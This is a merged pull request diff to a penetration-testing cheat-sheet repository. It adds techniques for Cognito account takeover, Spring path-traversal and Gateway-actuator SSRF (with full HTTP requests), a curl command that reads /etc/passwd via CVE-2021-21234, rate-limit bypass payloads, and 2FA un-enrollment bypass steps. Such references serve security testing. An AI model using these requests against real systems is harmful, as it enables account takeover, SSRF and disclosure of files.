Merge pull request #118 from 0xn3va/develop

Multiple updates

Cloud/AWS/amazon-cognito.md

@@ -24,6 +24,12 @@ Identity pool IDs can be stored client-side, for example within JavaScript, or r
 
 {% embed url="https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963" %}
 
+## Misconfigured user pool access
+
+If an application allows to write user attributes of an internally used AWS user pool, it can be used to abuse the trust between the application and the pool. In other words, it is possible to change the attributes and issue the JWT token, that will be used by an application. For instance, if an application uses normalized emails (in lower case), you can change one letter in an email address to an upper-case equivalent and takeover an account.
+
+{% embed url="https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/" %}
+
 # References
 
 - [Whitepaper: Internet-Scale analysis of AWS Cognito Security](https://andresriancho.com/wp-content/uploads/2019/06/whitepaper-internet-scale-analysis-of-aws-cognito-security.pdf)

Container/Escaping/exposed-docker-socket.md

@@ -145,3 +145,4 @@ To execute commands on the host system, start the Docker container and mount the
 # References
 
 - [Write up: Escaping the Cloud Shell container](https://offensi.com/2019/12/16/4-google-cloud-shell-bugs-explained-introduction/)
+- [Quarkslab's Blog: Why is Exposing the Docker Socket a Really Bad Idea?](https://blog.quarkslab.com/why-is-exposing-the-docker-socket-a-really-bad-idea.html)

Framework/Spring/routing-abuse.md

@@ -0,0 +1,8 @@
+# Path traversal with /..;/
+
+Spring Boot > 2.2.6 treats `https://website.com/allowed/..;/internal` same as `https://website.com/allowed/../internal`.
+
+This can lead to inconsistency between Spring and middleware. For instance, if an application is deployed behind nginx, you can bypass restrictions on allowed paths. Assume nginx forward all request to `/allowed/` to an application and deny other requests. In this case, request to `/allowed/../internal` will be blocked, however, `/allowed/..;/internal` is not - nginx will pass it as is to an application and it will actually hit `/internal`.
+
+References:
+- [@0xsapra tweet](https://mobile.twitter.com/0xsapra/status/1468551562712682499)

Framework/Spring/spring-boot-actuators.md

@@ -69,6 +69,63 @@ These properties have no effect unless the `/restart` endpoint is called, which
 
 > There are many other interesting properties, but most of them do not take effect immediately after being changed
 
+# gateway
+
+The [/gateway](https://cloud.spring.io/spring-cloud-gateway/reference/html/#actuator-api) actuator endpoint lets you monitor and interact with a Spring Cloud Gateway application. In other words, you can define routes for the appkication and use `/gateway` actuator to trigger requests according to these routes.
+
+There are at least the following issues:
+1. Routes can provide access to hidden or internal endpoints, which can be misconfigured or vulnerable. You can fetch all available routes via `GET`-request to `/actuator/gateway/routes`
+2. Full SSRF if [adding routes](https://cloud.spring.io/spring-cloud-gateway/reference/html/#creating-and-deleting-a-particular-route) does not require administrative permissions. The next request will create a route to localhost:
+
+    ```http
+    POST /actuator/gateway/routes/new_route HTTP/1.1
+    Host: app
+    Content-Type: application/json
+
+    {
+    "predicates": [
+        {
+        "name": "Path",
+        "args": {
+            "_genkey_0": "/new_route/**"
+        }
+        }
+    ],
+    "filters": [
+        {
+        "name": "RewritePath",
+        "args": {
+            "_genkey_0": "/new_route(?<path>.*)",
+            "_genkey_1": "/${path}"
+        }
+        }
+    ],
+    "uri": "https://localhost",
+    "order": 0
+    }
+    ```
+
+    Send refresh request to apply new route:
+
+    ```http
+    POST /actuator/gateway/refresh HTTP/1.1
+    Host: app
+    Content-Type: application/json
+
+    {
+        "predicate": "Paths: [/new_route], match trailing slash: true",
+        "route_id": "new_route",
+        "filters": [
+            "[[RewritePath /new_route(?<path>.*) = /${path}], order = 1]"
+        ],
+        "uri": "https://localhost",
+        "order": 0
+    }
+    ```
+
+References:
+- [BRING YOUR OWN SSRF – THE GATEWAY ACTUATOR](https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/)
+
 # trace/httptrace
 
 Displays HTTP trace information (by default, the last 100 HTTP request-response exchanges). Requires an `HttpTraceRepository` bean.
@@ -157,6 +214,18 @@ One of the MBeans of Tomcat (embedded into Spring Boot) is `createJNDIRealm`, wh
 
 Returns the contents of the logfile (if `logging.file.name` or `logging.file.path` properties have been set). Supports the use of the HTTP Range header to retrieve part of the log file's content.
 
+# logview
+
+[spring-boot-actuator-logview](https://github.com/lukashinsch/spring-boot-actuator-logview) version before `0.2.13` is vulnerable to path traversal that allows you to retreive arbitrary files.
+
+```bash
+# retreaving /etc/passwd
+$ curl http://localhost:8887/manage/log/view?filename=/etc/passwd&base=../../../../../
+```
+
+References:
+- [Writeup: CVE-2021-21234 Spring Boot Actuator Logview Directory Traversal](https://pyn3rd.github.io/2021/10/25/CVE-2021-21234-Spring-Boot-Actuator-Logview-Directory-Traversal/)
+
 # dump/threaddump
 
 Performs a thread dump.

SUMMARY.md

@@ -42,6 +42,7 @@
 - Spring
     - [Overview](Framework/Spring/overview.md)
     - [Mass Assignment](Framework/Spring/mass-assignment.md)
+    - [Routing Abuse](Framework/Spring/routing-abuse.md)
     - [SpEL Injection](Framework/Spring/spel-injection.md)
     - [Spring Boot Actuators](Framework/Spring/spring-boot-actuators.md)
     - [Spring Data Redis Insecure Deserialization](Framework/Spring/spring-data-redis-insecure-deserialization.md)
@@ -109,6 +110,9 @@
     - [Parameters Injection](Web%20Application/Command%20Injection/parameters-injection.md)
 - [Content Security Policy](Web%20Application/Content%20Security%20Policy/README.md)
 - [Cookie Security](Web%20Application/Cookie%20Security/README.md)
+    - [Cookie Bomb](Web%20Application/Cookie%20Security/cookie-bomb.md)
+    - [Cookie Jar Overflow](Web%20Application/Cookie%20Security/cookie-jar-overflow.md)
+    - [Cookie Tossing](Web%20Application/Cookie%20Security/cookie-tossing.md)
 - [CORS Misconfiguration](Web%20Application/CORS%20Misconfiguration/README.md)
 - [File Upload Vulnerabilities](Web%20Application/File%20Upload%20Vulnerabilities/README.md)
 - [GraphQL Vulnerabilities](Web%20Application/GraphQL%20Vulnerabilities/README.md)

Web Application/Broken Authentication/README.md

@@ -195,11 +195,25 @@ References:
 
 If an application does not set rate limits on login attempts, try to craft a dictionary and bruteforce a password.
 
+One of the implementations of rate limits uses a username or email as an identifier to count attempts. Try to bypass the protection by using extra spaces or upper/lower case:
+
+```http
+email=" [email protected]"
+email="[email protected]  "
+email="[email protected]"
+email="[email protected]"
+...
+```
+
 You can use the following links:
 - [WordList Compendium](https://github.com/Dormidera/WordList-Compendium) - personal compilation of wordlists & dictionaries for everything; users, passwords, directories, files, vulnerabilities, fuzzing, injections, wordlists of tools, etc.
 - [SecLists](https://github.com/danielmiessler/SecLists) - a collection of multiple types of lists used during security assessments.
 - [PWDB - New generation of Password Mass-Analysis](https://github.com/ignis-sec/Pwdb-Public) - a collection of all the data extracted from 1 billion credential leaks from the Internet.
 - [bopscrk](https://github.com/r3nt0n/bopscrk) - tool to generate smart and powerful wordlists.
+- [BruteLoops](https://github.com/arch4ngel/BruteLoops) - protocol agnostic online password guessing API.
+
+References:
+- [Report: Bypass a fix for report #708013](https://hackerone.com/reports/1363672)
 
 ## Credential stuffing
 

Web Application/Broken Authentication/two-factor-authentication-vulnerabilities.md

@@ -1,10 +1,10 @@
 # Abusing "remember me" function
 
-An application can provide users with the "remember me" function so that the next authentication from a device does not require to enter the second factor. To implement this functionality, an application can set cookies, save tokens in local storage and/or remember an IP address. In such situations, you need to find out how the "remember me" function is implemented and check if there is any way to spoof it. Try to check the following cases:
+An application can provide users with the "remember me" function so that the next authentication from a device does not require to enter the second factor. To implement this functionality, an application can set cookies, save tokens in local storage and/or remember an IP address. In such cases, you need to find out how the "remember me" function is implemented and check if there is any way to spoof it. Try to check the following cases:
 
-1. Whether the token stored in the cookie or local storage is random.
-2. How the token is stored and is it possible to access it from JavaScript.
-3. Is it possible to spoof an IP address using HTTP headers, see [Abusing IP whitelists](#abusing-ip-whitelists)
+1. Is the token stored in the cookie or local storage random?
+2. How the token is stored and is it possible to access the token from JavaScript?
+3. Is it possible to spoof an IP address using HTTP headers? (see [Abusing IP whitelists](#abusing-ip-whitelists))
 
 # Abusing IP whitelists
 
@@ -26,7 +26,20 @@ Enabling two-factor authentication should end previously created sessions. If th
 
 # Ignoring 2FA
 
-An application can ignore two-factor authentication when performing actions that lead to automatic login to an user account.
+An application can ignore two-factor authentication when performing actions that can lead to automatic login to an user account.
+
+## Abuse of half-authenticated sessions
+
+An application can issue a session token with limited access after providing credentials. Try to use this session token in a un-enrollment request to disable 2FA. You can check it with the next steps:
+
+1. Submit credentials to an application
+2. Catch a session token from the response
+3. Stop an authentication on the 2FA step
+4. Use the token in a un-enrollment request
+5. Login into account with out 2FA requirement
+
+References:
+- [Writeup: Bypassing Box's Time-based One-Time Password MFA](https://www.varonis.com/blog/box-mfa-bypass-totp/)
 
 ## Cross platform applications
 
@@ -89,7 +102,7 @@ Backup codes are generated immediately after a second factor is enabled and are
 
 Try to find a vulnerability that could steal backup codes from a response to a request to backup code display endpoint.
 
-# Rate limits
+# Improper rate limits
 
 {% embed url="https://0xn3va.gitbook.io/cheat-sheets/web-application/improper-rate-limits" %}